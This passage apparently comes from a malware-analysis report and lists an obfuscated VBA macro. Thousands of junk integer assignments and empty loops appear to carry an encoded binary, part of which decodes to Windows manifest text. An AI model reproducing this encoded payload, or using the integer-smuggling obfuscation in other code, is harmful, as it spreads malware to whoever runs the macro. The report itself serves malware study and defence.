                            6314

                            Y = 155074369

                            6315

                            For I = 1 To 2

                            6316

                            Y = 0

                            6317

                            Next

                            6318

                            Y = 931694987

                            6319

                            Y = - 322122031

                            6320

                            Y = - 3420462

                            6321

                            Y = - 4670529

                            6322

                            Y = - 1570280593

                            6323

                            Y = 141389681

                            6324

                            Y = 141784183

                            6325

                            Y = 91321206

                            6326

                            Y = - 2036753764

                            6327

                            Y = - 4407356

                            6328

                            Y = - 5262662

                            6329

                            Y = - 25132408

                            6330

                            Y = 1664760637

                            6331

                            Y = 23949171

                            6332

                            Y = 0

                            6333

                            Y = 28159922

                            6334

                            Y = 679115901

                            6335

                            Y = - 709248067

                            6336

                            Y = - 3881013

                            6337

                            Y = - 111517850

                            6338

                            Y = 442590054

                            6339

                            For I = 1 To 3

                            6340

                            Y = 0

                            6341

                            Next

                            6342

                            Y = 259619710

                            6343

                            Y = - 236788763

                            6344

                            Y = - 6117715

                            6345

                            Y = - 10986653

                            6346

                            Y = 2033135667

                            6347

                            Y = 558451535

                            6348

                            Y = 0

                            6349

                            Y = 310806408

                            6350

                            Y = - 68818711

                            6351

                            Y = - 1775896

                            6352

                            Y = - 4078393

                            6353

                            Y = - 647270283

                            6354

                            Y = 90663018

                            6355

                            For I = 1 To 4

                            6356

                            Y = 0

                            6357

                            Next

                            6358

                            Y = - 942813747

                            6359

                            Y = - 6249301

                            6360

                            Y = - 3749425

                            6361

                            Y = - 5459787

                            6362

                            Y = - 1117624983

                            6363

                            Y = 0

                            6364

                            Y = 111059105

                            6365

                            Y = 2039320207

                            6366

                            Y = - 338307112

                            6367

                            Y = - 3749428

                            6368

                            Y = - 292580199

                            6369

                            Y = 208301165

                            6370

                            For I = 1 To 3

                            6371

                            Y = 0

                            6372

                            Next

                            6373

                            Y = 93097617

                            6374

                            Y = - 539173410

                            6375

                            Y = - 5657421

                            6376

                            Y = - 6117717

                            6377

                            Y = - 1033080974

                            6378

                            Y = 1614626626

                            6379

                            For I = 1 To 2

                            6380

                            Y = 0

                            6381

                            Next

                            6382

                            Y = 311727510

                            6383

                            Y = - 691681337

                            6384

                            Y = - 2565155

                            6385

                            Y = - 7170148

                            6386

                            Y = 1732396360

                            6387

                            For I = 1 To 3

                            6388

                            Y = 0

                            6389

                            Next

                            6390

                            Y = 1267568272

                            6391

                            Y = - 19276835

                            6392

                            Y = - 4473149

                            6393

                            Y = - 28288672

                            6394

                            Y = 892614200

                            6395

                            For I = 1 To 3

                            6396

                            Y = 0

                            6397

                            Next

                            6398

                            Y = 1722066341

                            6399

                            Y = - 920590

                            6400

                            Y = - 1578518

                            6401

                            Y = - 2894120

                            6402

                            Y = - 159481209

                            6403

                            Y = 1934183246

                            6404

                            Y = 528384130

                            6405

                            Y = 1467907968

                            6406

                            Y = - 388572967

                            6407

                            Y = - 3881012

                            6408

                            Y = - 2696996

                            6409

                            Y = - 4802115

                            6410

                            Y = - 564239511

                            6411

                            Y = 156522073

                            6412

                            For I = 1 To 2

                            6413

                            Y = 0

                            6414

                            Next

                            6415

                            Y = 228104858

                            6416

                            Y = 1350796420

                            6417

                            Y = - 1584492400

                            6418

                            Y = - 1710104

                            6419

                            Y = - 2301984

                            6420

                            Y = - 2762791

                            6421

                            Y = - 53160233

                            6422

                            Y = - 2170398

                            6423

                            Y = - 2828326

                            6424

                            Y = - 4670530

                            6425

                            Y = - 611545197

                            6426

                            Y = - 1233486721

                            6427

                            Y = - 2075373997

                            6428

                            Y = 25857424

                            6429

                            For I = 1 To 4

                            6430

                            Y = 0

                            6431

                            Next

                            6432

                            Y = - 1919444840

                            6433

                            Y = - 854797

                            6434

                            Y = - 20066352

                            6435

                            Y = - 18816029

                            6436

                            Y = - 2368033

                            6437

                            Y = - 19803179

                            6438

                            Y = - 1775640

                            6439

                            Y = - 5131080

                            6440

                            Y = - 1621468065

                            6441

                            For I = 1 To 7

                            6442

                            Y = 0

                            6443

                            Next

                            6444

                            Y = 612204159

                            6445

                            Y = 2054649976

                            6446

                            Y = 2001489231

                            6447

                            Y = - 556410921

                            6448

                            Y = - 2894379

                            6449

                            Y = - 679049077

                            6450

                            Y = - 1246842960

                            6451

                            Y = - 795173987

                            6452

                            Y = 2002541919

                            6453

                            For I = 1 To 10

                            6454

                            Y = 0

                            6455

                            Next

                            6456

                            Y = 1133350543

                            6457

                            Y = 1787135622

                            6458

                            Y = 1164799600

                            6459

                            Y = 60003478

                            6460

                            Y = 75925641

                            6461

                            For I = 1 To 21

                            6462

                            Y = 0

                            6463

                            Next

                            6464

                            Y = 2040

                            6465

                            For I = 1 To 2

                            6466

                            Y = 224

                            6467

                            Next

                            6468

                            Y = 128

                            6469

                            For I = 1 To 2

                            6470

                            Y = 384

                            6471

                            Next

                            6472

                            Y = 33027

                            6473

                            Y = 49411

                            6474

                            Y = 33027

                            6475

                            Y = 33667

                            6476

                            For I = 1 To 2

                            6477

                            Y = 384

                            6478

                            Next

                            6479

                            For I = 1 To 2

                            6480

                            Y = 4064

                            6481

                            Next

                            6482

                            Y = 8188

                            6483

                            Y = 65535

                            6484

                            Y = 65536

                            6485

                            Y = 808452099

                            6486

                            Y = 65536

                            6487

                            Y = 631767072

                            6488

                            Y = 131072

                            6489

                            Y = 8224

                            6490

                            Y = 2097153

                            6491

                            Y = 4264

                            6492

                            Y = 269484035

                            6493

                            Y = 65536

                            6494

                            Y = 73924640

                            6495

                            Y = 262144

                            6496

                            Y = 1019198447

                            6497

                            Y = 1819113535

                            6498

                            Y = 1919252000

                            6499

                            Y = 1852795251

                            6500

                            Y = 774971965

                            6501

                            Y = 1696604720

                            6502

                            Y = 1685021550

                            6503

                            Y = 1030188649

                            6504

                            Y = 1718908194

                            6505

                            Y = 1059207213

                            6506

                            Y = 1007291710

                            6507

                            Y = 1986884449

                            6508

                            Y = 1935751729

                            6509

                            Y = 1651336563

                            6510

                            Y = 1830844780

                            6511

                            Y = 1718185569

                            6512

                            Y = 1450472293

                            6513

                            Y = 1769173605

                            6514

                            Y = 574451311

                            6515

                            Y = 573582897

                            6516

                            Y = 1819113504

                            6517

                            Y = 574452590

                            6518

                            Y = 980316789

                            6519

                            Y = 1701340019

                            6520

                            Y = 762536301

                            6521

                            Y = 1919117677

                            6522

                            Y = 1718580079

                            6523

                            Y = 1868770676

                            6524

                            Y = 1935751789

                            6525

                            Y = 829828717

                            6526

                            Y = 1836589090

                            6527

                            Y = 980643436

                            6528

                            Y = 1986884449

                            6529

                            Y = 1965178161

                            6530

                            Y = 1933209202

                            6531

                            Y = 1835362403

                            6532

                            Y = 1831695201

                            6533

                            Y = 1869767529

                            6534

                            Y = 1952870259

                            6535

                            Y = 1836016429

                            6536

                            Y = 1836278074

                            6537

                            Y = 573666862

                            6538

                            Y = 1819113504

                            6539

                            Y = 1631220590

                            6540

                            Y = 846622067

                            6541

                            Y = 1920279101

                            6542

                            Y = 1668495982

                            6543

                            Y = 1634559336

                            6544

                            Y = 1768762739

                            6545

                            Y = 1936683619

                            6546

                            Y = 762603119

                            6547

                            Y = 980250467

                            6548

                            Y = 778924897

                            6549

                            Y = 539112054

                            6550

                            Y = 1852599672

                            6551

                            Y = 1937259123

                            6552

                            Y = 1747074409

                            6553

                            Y = 980448372

                            6554

                            Y = 2004299567

                            6555

                            Y = 863448695

                            6556

                            Y = 1735552814

                            6557

                            Y = 808464943

                            6558

                            Y = 1297624881

                            6559

                            Y = 1751339852

                            6560

                            Y = 761359717

                            6561

                            Y = 1953721961

                            6562

                            Y = 1701015137

                            6563

                            Y = 168640034

                            6564

                            Y = 1631330336

                            6565

                            Y = 1835365235

                            6566

                            Y = 1232694370

                            6567

                            Y = 1953391972

                            6568

                            Y = 544830569

                            6569

                            Y = 1936876918

                            6570

                            Y = 1030647657

                            6571

                            Y = 808333602

                            6572

                            Y = 808333358

                            6573

                            Y = 1634607138

                            6574

                            Y = 574449005

                            6575

                            Y = 1883339085

                            6576

                            Y = 1667853424

                            6577

                            Y = 1869182049

                            6578

                            Y = 1885417070

                            6579

                            Y = 1043276400

                            6580

                            Y = 538970637

                            6581

                            Y = 1970435132

                            6582

                            Y = 1850307699

                            6583

                            Y = 2015391590

                            6584

                            Y = 1936616557

                            6585

                            Y = 1920279101

                            6586

                            Y = 1668495982

                            6587

                            Y = 1634559336

                            6588

                            Y = 1768762739

                            6589

                            Y = 1936683619

                            6590

                            Y = 762603119

                            6591

                            Y = 980250467

                            6592

                            Y = 778924897

                            6593

                            Y = 1042428534

                            6594

                            Y = 538970637

                            6595

                            Y = 1933320224

                            6596

                            Y = 1920295781

                            6597

                            Y = 1048147049

                            6598

                            Y = 538970637

                            6599

                            Y = 538976288

                            6600

                            Y = 1902473788

                            6601

                            Y = 1953719669

                            6602

                            Y = 1917871205

                            6603

                            Y = 1818850921

                            6604

                            Y = 1936025445

                            6605

                            Y = 1819113504

                            6606

                            Y = 574452590

                            6607

                            Y = 980316789

                            6608

                            Y = 1701340019

                            6609

                            Y = 762536301

                            6610

                            Y = 1919117677

                            6611

                            Y = 1718580079

                            6612

                            Y = 1868770676

                            6613

                            Y = 1935751789

                            6614

                            Y = 863383149

                            6615

                            Y = 168640034

                            6616

                            For I = 1 To 2

                            6617

                            Y = 538976288

                            6618

                            Next

                            6619

                            Y = 757932348

                            6620

                            Y = - 794832864

                            6621

                            Y = - 796864080

                            6622

                            Y = - 792932176

                            6623

                            Y = - 779955787

                            6624

                            Y = 546034048

                            6625

                            Y = - 1328497456

                            6626

                            Y = - 1194279472

                            6627

                            Y = - 1244625711

                            6628

                            Y = - 2100198959

                            6629

                            Y = 1428205776

                            6630

                            Y = 168641345

                            6631

                            For I = 1 To 2

                            6632

                            Y = 538976288

                            6633

                            Next

                            6634

                            Y = - 1613750240

                            6635

                            Y = - 1194295087

                            6636

                            Y = - 792866784

                            6637

                            Y = - 792801099

                            6638

                            Y = - 796536399

                            6639

                            Y = - 793456450

                            6640

                            Y = - 792932168

                            6641

                            Y = - 780021314

                            6642

                            Y = 548982914

                            6643

                            Y = - 1211057968

                            6644

                            Y = - 1244611376

                            6645

                            Y = - 1194279472

                            6646

                            Y = - 1932426543

                            6647

                            Y = - 779890400

                            6648

                            Y = - 792801152

                            6649

                            Y = - 793390926

                            6650

                            Y = 546099645

                            6651

                            Y = - 1076853807

                            6652

                            Y = - 1328512815

                            6653

                            Y = - 1143950640

                            6654

                            Y = - 1110395440

                            6655

                            Y = - 1882081072

                            6656

                            Y = - 779890400

                            6657

                            Y = - 776613753

                            6658

                            Y = - 776089470

                            6659

                            Y = - 792932213

                            6660

                            Y = - 1211096904

                            6661

                            Y = - 1076842288

                            6662

                            Y = - 2116962096

                            6663

                            Y = - 1127182383

                            6664

                            Y = 1461762256

                            6665

                            Y = 1868852841

                            6666

                            Y = - 803179657

                            6667

                            Y = - 793718601

                            6668

                            Y = - 793390916

                            6669

                            Y = - 776417091

                            6670

                            Y = 548786306

                            6671

                            Y = 538970637

                            6672

                            For I = 1 To 2

                            6673

                            Y = 538976288

                            6674

                            Next

                            6675

                            Y = - 1211071535

                            6676

                            Y = - 1143949872

                            6677

                            Y = 1902473760

                            6678

                            Y = 1953719669

                            6679

                            Y = 2017813605

                            6680

                            Y = 1953850213

                            6681

                            Y = 1282305897

                            6682

                            Y = 1818588773

                            6683

                            Y = - 792801248

                            6684

                            Y = - 792866636

                            6685

                            Y = 549245112

                            6686

                            Y = - 1211057968

                            6687

                            Y = - 796798688

                            6688

                            Y = - 793390917

                            6689

                            Y = - 779890252

                            6690

                            Y = - 796274290

                            6691

                            Y = 545640888

                            6692

                            Y = - 1110394928

                            6693

                            Y = - 2016300848

                            6694

                            Y = - 1110395440

                            6695

                            Y = - 1177503536

                            6696

                            Y = 218762542

                            6697

                            Y = 538976266

                            6698

                            Y = 538976288

                            6699

                            Y = 1701985312

                            6700

                            Y = 1936029041

                            6701

                            Y = 1164207476

                            6702

                            Y = 1969448312

                            6703

                            Y = 1852795252

                            6704

                            Y = 1702257996

                            6705

                            Y = 1814044780

                            6706

                            Y = 1818588773

                            6707

                            Y = 1935745597

                            6708

                            Y = 1870032457

                            6709

                            Y = 577922411

                            6710

                            Y = 1097430304

                            6711

                            Y = 1936024419

                            6712

                            Y = 1713519987

                            6713

                            Y = 1702063201

                            6714

                            Y = 1043275810

                            6715

                            Y = 538970637

                            6716

                            Y = 538976288

                            6717

                            Y = 1916543008

                            6718

                            Y = 1702195557

                            6719

                            Y = 1684370547

                            6720

                            Y = 1667594309

                            6721

                            Y = 1869182069

                            6722

                            Y = 1986350190

                            6723

                            Y = 538995813

                            6724

                            Y = 1702258028

                            6725

                            Y = 1914846572

                            6726

                            Y = 1769304421

                            6727

                            Y = 1682007410

                            6728

                            Y = 1768843629

                            6729

                            Y = 1634890867

                            6730

                            Y = 577924980

                            6731

                            Y = 1097430304

                            6732

                            Y = 1936024419

                            6733

                            Y = 1713519987

                            6734

                            Y = 1702063201

                            6735

                            Y = 1043275810

                            6736

                            Y = 538970637

                            6737

                            Y = 538976288

                            6738

                            Y = 1916543008

                            6739

                            Y = 1702195557

                            6740

                            Y = 1684370547

                            6741

                            Y = 1667594309

                            6742

                            Y = 1869182069

                            6743

                            Y = 1986350190

                            6744

                            Y = 538995813

                            6745

                            Y = 1702258028

                            6746

                            Y = 1747074412

                            6747

                            Y = 1701341033

                            6748

                            Y = 1984001139

                            6749

                            Y = 1634494817

                            6750

                            Y = 577072226

                            6751

                            Y = 1097430304

                            6752

                            Y = 1936024419

                            6753

                            Y = 1713519987

                            6754

                            Y = 1702063201

                            6755

                            Y = 1043275810

                            6756

                            Y = 168626701

                            6757

                            For I = 1 To 3

                            6758

                            Y = 538976288

                            6759

                            Next

                            6760

                            Y = - 2133745712

                            6761

                            Y = - 786384688

                            6762

                            Y = - 793063293

                            6763

                            Y = - 793259856

                            6764

                            Y = - 792866640

                            6765

                            Y = 548982968

                            6766

                            Y = - 1211071535

                            6767

                            Y = - 1328497712

                            6768

                            Y = 1902473760

                            6769

                            Y = 1953719669

                            6770

                            Y = 2017813605

                            6771

                            Y = 1953850213

                            6772

                            Y = 1282305897

                            6773

                            Y = 1818588773

                            6774

                            Y = - 793587680

                            6775

                            Y = - 780086856

                            6776

                            Y = - 796667518

                            6777

                            Y = - 792997712

                            6778

                            Y = - 793259848

                            6779

                            Y = - 796470864

                            6780

                            Y = 546296248

                            6781

                            Y = - 1328511791

                            6782

                            Y = - 1143948848

                            6783

                            Y = - 1294942512

                            6784

                            Y = 548982816

                            6785

                            Y = - 1244626735

                            6786

                            Y = - 2116962864

                            6787

                            Y = - 2133753135

                            6788

                            Y = - 803163952

                            6789

                            Y = - 796667471

                            6790

                            Y = - 776613708

                            6791

                            Y = - 1093656446

                            6792

                            Y = - 1160740143

                            6793

                            Y = - 1898857520

                            6794

                            Y = - 1244624943

                            6795

                            Y = - 1328497200

                            6796

                            Y = 537529646

                            6797

                            For I = 1 To 2

                            6798

                            Y = 538976288

                            6799

                            Next

                            6800

                            Y = - 803200992

                            6801

                            Y = - 796798571

                            6802

                            Y = 548982971

                            6803

                            Y = - 1949191472

                            6804

                            Y = - 796536544

                            6805

                            Y = - 796732994

                            6806

                            Y = - 796733000

                            6807

                            Y = - 1194319691

                            6808

                            Y = - 1076854319

                            6809

                            Y = - 1143947568

                            6810

                            Y = - 1211069231

                            6811

                            Y = - 1294942512

                            6812

                            Y = - 2100186928

                            6813

                            Y = - 803173167

                            6814

                            Y = - 776417102

                            6815

                            Y = - 779955840

                            6816

                            Y = - 793718653

                            6817

                            Y = - 793194309

                            6818

                            Y = - 776941385

                            6819

                            Y = - 776417146

                            6820

                            Y = - 2066669426

                            6821

                            Y = - 1177505584

                            6822

                            Y = - 1093616688

                            6823

                            Y = - 803163440

                            6824

                            Y = - 2133778248

                            6825

                            Y = - 1244613168

                            6826

                            Y = - 2100198959

                            6827

                            Y = - 1328512815

                            6828

                            Y = - 793456608

                            6829

                            Y = 546296251

                            6830

                            Y = - 1311719728

                            6831

                            Y = - 1328512815

                            6832

                            Y = - 1110408495

                            6833

                            Y = - 1177502000

                            6834

                            Y = 537529632

                            6835

                            For I = 1 To 2

                            6836

                            Y = 538976288

                            6837

                            Next

                            6838

                            Y = - 786423776

                            6839

                            Y = - 792801151

                            6840

                            Y = - 792932174

                            6841

                            Y = - 780021323

                            6842

                            Y = - 793194366

                            6843

                            Y = - 776023876

                            6844

                            Y = - 796733055

                            6845

                            Y = - 786420552

                            6846

                            Y = - 793456509

                            6847

                            Y = - 792997712

                            6848

                            Y = - 796733000

                            6849

                            Y = - 2083446603

                            6850

                            Y = - 1244612656

                            6851

                            Y = 1914747856

                            6852

                            Y = 1702195557

                            6853

                            Y = 1684370547

                            6854

                            Y = 1667594309

                            6855

                            Y = 1869182069

                            6856

                            Y = 1986350190

                            6857

                            Y = 221146213

                            6858

                            Y = 538976266

                            6859

                            Y = 538976288

                            6860

                            Y = 1043148064

                            6861

                            Y = 538970637

                            6862

                            Y = 538976288

                            6863

                            Y = 1916543008

                            6864

                            Y = 1702195557

                            6865

                            Y = 1684370547

                            6866

                            Y = 1667594309

                            6867

                            Y = 1869182069

                            6868

                            Y = 1986350190

                            6869

                            Y = 1814064229

                            6870

                            Y = 1818588773

                            6871

                            Y = 1935745597

                            6872

                            Y = 1870032457

                            6873

                            Y = 577922411

                            6874

                            Y = 1097430304

                            6875

                            Y = 1936024419

                            6876

                            Y = 1713519987

                            6877

                            Y = 1702063201

                            6878

                            Y = 1043275810

                            6879

                            Y = 538970637

                            6880

                            Y = 538976288

                            6881

                            Y = 1701982012

                            6882

                            Y = 1936029041

                            6883

                            Y = 1348756852

                            6884

                            Y = 1769367922

                            6885

                            Y = 1701274988

                            6886

                            Y = 168640115

                            6887

                            Y = 538976288

                            6888

                            Y = 1702047548

                            6889

                            Y = 1769108835

                            6890

                            Y = 222198132

                            6891

                            Y = 1008738314

                            6892

                            Y = 1970435119

                            6893

                            Y = 1850307699

                            6894

                            Y = 222195558

                            6895

                            Y = 537529610

                            6896

                            Y = 1868774432

                            6897

                            Y = 1952542829

                            6898

                            Y = 1818845801

                            6899

                            Y = 544830569

                            6900

                            Y = 1852599672

                            6901

                            Y = 1965178227

                            6902

                            Y = 1933209202

                            6903

                            Y = 1835362403

                            6904

                            Y = 1831695201

                            6905

                            Y = 1869767529

                            6906

                            Y = 1952870259

                            6907

                            Y = 1836016429

                            6908

                            Y = 1836016442

                            6909

                            Y = 1769234800

                            6910

                            Y = 1768712546

                            6911

                            Y = 1982757236

                            6912

                            Y = 222175793

                            6913

                            Y = 538976266

                            6914

                            End Sub

                            LineInstructionMeta Information
                            3754

                            Private Sub CheckHash3()

                            3755

                            Y = 36778289

                            executed
                            3756

                            Y = 137441585

                            3757

                            Y = 305213745

                            3758

                            Y = 422654257

                            3759

                            Y = 405877041

                            3760

                            Y = 305213745

                            3761

                            Y = 171061810

                            3762

                            Y = 53621298

                            3763

                            For I = 1 To 25

                            3764

                            Y = 0

                            3765

                            Next

                            3766

                            Y = 20066866

                            3767

                            Y = 70332721

                            3768

                            Y = 137441585

                            3769

                            Y = 154218801

                            3770

                            Y = 305279538

                            3771

                            Y = 724709938

                            3772

                            Y = 1110585906

                            3773

                            Y = 1546464557

                            3774

                            Y = 2083006504

                            3775

                            Y = - 1910168283

                            3776

                            Y = - 1943788508

                            3777

                            Y = 1898259749

                            3778

                            Y = 1076505130

                            3779

                            Y = 472985905

                            3780

                            Y = 254882097

                            3781

                            Y = 271659313

                            3782

                            Y = 556871985

                            3783

                            Y = 1009856817

                            3784

                            Y = 1295069489

                            3785

                            Y = 1261515057

                            3786

                            Y = 1043411249

                            3787

                            Y = 691089713

                            3788

                            Y = 271659313

                            3789

                            Y = 53555505

                            3790

                            For I = 1 To 2

                            3791

                            Y = 0

                            3792

                            Next

                            3793

                            Y = 20001073

                            3794

                            For I = 1 To 2

                            3795

                            Y = 36778289

                            3796

                            Next

                            3797

                            Y = 20001073

                            3798

                            For I = 1 To 17

                            3799

                            Y = 0

                            3800

                            Next

                            3801

                            Y = 20066866

                            3802

                            Y = 137507378

                            3803

                            Y = 439431473

                            3804

                            Y = 758198577

                            3805

                            Y = 875639089

                            3806

                            Y = 1362244146

                            3807

                            Y = - 844979029

                            3808

                            Y = - 4407352

                            3809

                            Y = - 4473145

                            3810

                            Y = - 57634152

                            3811

                            Y = - 12566461

                            3812

                            Y = - 12565948

                            3813

                            Y = - 214089919

                            3814

                            Y = - 1926616534

                            3815

                            Y = 1429287217

                            3816

                            Y = 1211183409

                            3817

                            Y = 1227960625

                            3818

                            Y = 1479553072

                            3819

                            Y = 2049781037

                            3820

                            Y = - 1943130578

                            3821

                            Y = - 2043662288

                            3822

                            Y = 1982935345

                            3823

                            Y = 1462841649

                            3824

                            Y = 724644145

                            3825

                            Y = 254882097

                            3826

                            For I = 1 To 2

                            3827

                            Y = 103887153

                            3828

                            Next

                            3829

                            Y = 154218801

                            3830

                            Y = 221327665

                            3831

                            Y = 238104881

                            3832

                            Y = 170996017

                            3833

                            Y = 87175730

                            3834

                            Y = 36844082

                            3835

                            For I = 1 To 13

                            3836

                            Y = 0

                            3837

                            Next

                            3838

                            Y = 53621298

                            3839

                            Y = 221393458

                            3840

                            Y = 305279538

                            3841

                            Y = 489434156

                            3842

                            Y = 1193945642

                            3843

                            Y = 1949117741

                            3844

                            Y = - 2026885072

                            3845

                            Y = - 1319676071

                            3846

                            Y = - 4210230

                            3847

                            Y = - 4275767

                            3848

                            Y = - 4341560

                            3849

                            Y = - 4407353

                            3850

                            Y = - 12895171

                            3851

                            Y = - 12829376

                            3852

                            Y = - 12631998

                            3853

                            Y = - 1121244373

                            3854

                            Y = - 1708052175

                            3855

                            Y = - 1303030183

                            3856

                            Y = - 1083939480

                            3857

                            Y = - 1439814098

                            3858

                            Y = - 902680012

                            3859

                            Y = - 701156041

                            3860

                            Y = - 1372968406

                            3861

                            Y = - 1792135634

                            3862

                            Y = 1966092336

                            3863

                            Y = 1261515057

                            3864

                            Y = 741421361

                            3865

                            Y = 523317553

                            3866

                            Y = 506540337

                            3867

                            Y = 573649201

                            3868

                            For I = 1 To 2

                            3869

                            Y = 691089713

                            3870

                            Next

                            3871

                            Y = 556871985

                            3872

                            Y = 338833970

                            3873

                            Y = 154284594

                            3874

                            Y = 36844082

                            3875

                            For I = 1 To 11

                            3876

                            Y = 0

                            3877

                            Next

                            3878

                            Y = 204616242

                            3879

                            Y = 791818802

                            3880

                            Y = 1903194483

                            3881

                            Y = - 1954512251

                            3882

                            Y = 1646206751

                            3883

                            Y = - 1489948107

                            3884

                            Y = - 885639366

                            3885

                            Y = - 1104203985

                            3886

                            Y = - 512856206

                            3887

                            Y = - 4144181

                            3888

                            Y = - 4209974

                            3889

                            Y = - 4275767

                            3890

                            Y = - 4341559

                            3891

                            Y = - 11776688

                            3892

                            Y = - 12631739

                            3893

                            Y = - 12368567

                            3894

                            Y = - 852545744

                            3895

                            Y = - 1085781942

                            3896

                            Y = - 139677768

                            3897

                            Y = - 4802110

                            3898

                            Y = - 140598872

                            3899

                            Y = - 27895716

                            3900

                            Y = - 11973808

                            3901

                            Y = - 112834226

                            3902

                            Y = - 1070583501

                            3903

                            Y = - 2127877333

                            3904

                            Y = 1630548016

                            3905

                            Y = 1311846705

                            3906

                            Y = 1144074545

                            3907

                            Y = 1093742897

                            3908

                            Y = 1127231536

                            3909

                            Y = 1177628977

                            3910

                            Y = 1127297329

                            3911

                            Y = 959525169

                            3912

                            Y = 657535281

                            3913

                            Y = 305213745

                            3914

                            Y = 87109937

                            3915

                            For I = 1 To 10

                            3916

                            Y = 0

                            3917

                            Next

                            3918

                            Y = 204616242

                            3919

                            Y = 1196182862

                            3920

                            Y = - 1096439893

                            3921

                            Y = - 3552046

                            3922

                            Y = - 3617839

                            3923

                            Y = - 245341336

                            3924

                            Y = - 11315361

                            3925

                            Y = - 11775914

                            3926

                            Y = - 483249357

                            3927

                            Y = - 242841717

                            3928

                            Y = - 4078388

                            3929

                            Y = - 4144181

                            3930

                            Y = - 4144437

                            3931

                            Y = - 4210230

                            3932

                            Y = - 10131861

                            3933

                            Y = - 12171186

                            3934

                            Y = - 11776427

                            3935

                            Y = - 482657217

                            3936

                            Y = - 139480647

                            3937

                            Y = - 4604732

                            3938

                            Y = - 4670525

                            3939

                            Y = - 4736318

                            3940

                            Y = - 4802110

                            3941

                            Y = - 10854811

                            3942

                            Y = - 11117724

                            3943

                            Y = - 11117981

                            3944

                            Y = - 1976750544

                            3945

                            Y = 1445932847

                            3946

                            Y = 1362178353

                            3947

                            Y = 1328623921

                            3948

                            Y = 1311846705

                            3949

                            Y = 1295069489

                            3950

                            Y = 1278292273

                            3951

                            Y = 1177628977

                            3952

                            Y = 1009856817

                            3953

                            Y = 691089713

                            3954

                            Y = 321990961

                            3955

                            Y = 87109937

                            3956

                            For I = 1 To 10

                            3957

                            Y = 0

                            3958

                            Next

                            3959

                            Y = 489828914

                            3960

                            Y = - 1146179660

                            3961

                            Y = - 3354924

                            3962

                            Y = - 3420717

                            3963

                            Y = - 3486510

                            3964

                            Y = - 4538941

                            3965

                            Y = - 11250085

                            3966

                            Y = - 12105394

                            3967

                            Y = - 27369628

                            3968

                            Y = - 38488131

                            3969

                            Y = - 3946546

                            3970

                            Y = - 4012595

                            3971

                            Y = - 4078388

                            3972

                            Y = - 4144181

                            3973

                            Y = - 5920594

                            3974

                            Y = - 7697005

                            3975

                            Y = - 10065552

                            3976

                            Y = - 23421788

                            3977

                            Y = - 4473145

                            3978

                            Y = - 4538939

                            3979

                            Y = - 4604732

                            3980

                            Y = - 4670525

                            3981

                            Y = - 6710364

                            3982

                            Y = - 11117724

                            3983

                            Y = - 10459791

                            3984

                            Y = - 263038878

                            3985

                            Y = 1377113365

                            3986

                            Y = 758066991

                            3987

                            Y = 825307441

                            3988

                            Y = 925970737

                            3989

                            Y = 1009856817

                            3990

                            Y = 1043411249

                            3991

                            Y = 1026634033

                            3992

                            Y = 942747953

                            3993

                            Y = 791753009

                            3994

                            Y = 540094769

                            3995

                            Y = 254882097

                            3996

                            Y = 87109937

                            3997

                            Y = 36778289

                            3998

                            For I = 1 To 9

                            3999

                            Y = 0

                            4000

                            Next

                            4001

                            Y = 456274482

                            4002

                            Y = - 1786214004

                            4003

                            Y = - 3288875

                            4004

                            Y = - 3354668

                            4005

                            Y = - 3420460

                            4006

                            Y = - 3486253

                            4007

                            Y = - 4670528

                            4008

                            Y = - 3617839

                            4009

                            Y = - 3683632

                            4010

                            Y = - 3814961

                            4011

                            Y = - 3880753

                            4012

                            Y = - 3946546

                            4013

                            Y = - 4012595

                            4014

                            Y = - 4078388

                            4015

                            Y = - 4144181

                            4016

                            Y = - 4209974

                            4017

                            Y = - 4275766

                            4018

                            Y = - 4276023

                            4019

                            Y = - 4341816

                            4020

                            Y = - 4407609

                            4021

                            For I = 1 To 2

                            4022

                            Y = - 4538939

                            4023

                            Next

                            4024

                            Y = - 9210242

                            4025

                            Y = - 12433582

                            4026

                            Y = - 12301737

                            4027

                            Y = - 902810562

                            4028

                            Y = 671746570

                            4029

                            Y = 204550449

                            4030

                            Y = 288436529

                            4031

                            Y = 389099825

                            4032

                            Y = 489763121

                            4033

                            Y = 607203633

                            4034

                            Y = 657535281

                            4035

                            Y = 623980849

                            4036

                            Y = 523317553

                            4037

                            Y = 372322609

                            4038

                            Y = 221327665

                            4039

                            Y = 103887153

                            4040

                            Y = 53555505

                            4041

                            For I = 1 To 9

                            4042

                            Y = 0

                            4043

                            Next

                            4044

                            Y = 204616242

                            4045

                            Y = 1785096041

                            4046

                            Y = - 3157546

                            4047

                            Y = - 3223339

                            4048

                            Y = - 3289131

                            4049

                            Y = - 3354924

                            4050

                            Y = - 3420717

                            4051

                            Y = - 3486510

                            4052

                            Y = - 4012853

                            4053

                            Y = - 4736576

                            4054

                            Y = - 5460042

                            4055

                            Y = - 6183508

                            4056

                            Y = - 6775645

                            4057

                            Y = - 7104353

                            4058

                            Y = - 7499367

                            4059

                            Y = - 7236194

                            4060

                            Y = - 6841693

                            4061

                            Y = - 5591370

                            4062

                            Y = - 4275767

                            4063

                            Y = - 4341560

                            4064

                            Y = - 4407352

                            4065

                            Y = - 4473145

                            4066

                            Y = - 12894649

                            4067

                            Y = - 14472906

                            4068

                            Y = - 14538698

                            4069

                            Y = - 2146627821

                            4070

                            Y = 285212672

                            4071

                            For I = 1 To 2

                            4072

                            Y = 36778289

                            4073

                            Next

                            4074

                            Y = 87109937

                            4075

                            Y = 153824043

                            4076

                            Y = 221327665

                            4077

                            Y = 305213745

                            4078

                            Y = 321990961

                            4079

                            Y = 271659313

                            4080

                            Y = 204550449

                            4081

                            Y = 120664369

                            4082

                            Y = 53555505

                            4083

                            Y = 36778289

                            4084

                            For I = 1 To 9

                            4085

                            Y = 0

                            4086

                            Next

                            4087

                            Y = 53621298

                            4088

                            Y = 1093808690

                            4089

                            Y = - 490683705

                            4090

                            Y = - 3157545

                            4091

                            Y = - 3223082

                            4092

                            Y = - 3288875

                            4093

                            Y = - 3880754

                            4094

                            Y = - 4933443

                            4095

                            Y = - 5196614

                            4096

                            Y = - 4604990

                            4097

                            Y = - 4275512

                            4098

                            Y = - 3486511

                            4099

                            Y = - 3223340

                            4100

                            Y = - 3091753

                            4101

                            Y = - 3880755

                            4102

                            Y = - 4999492

                            4103

                            Y = - 6907230

                            4104

                            Y = - 8223089

                            4105

                            Y = - 8420212

                            4106

                            Y = - 5591626

                            4107

                            Y = - 4341559

                            4108

                            Y = - 4407352

                            4109

                            Y = - 13223359

                            4110

                            Y = - 14802130

                            4111

                            Y = - 14933458

                            4112

                            Y = - 1777397484

                            4113

                            Y = 1176510496

                            4114

                            Y = 1178879045

                            4115

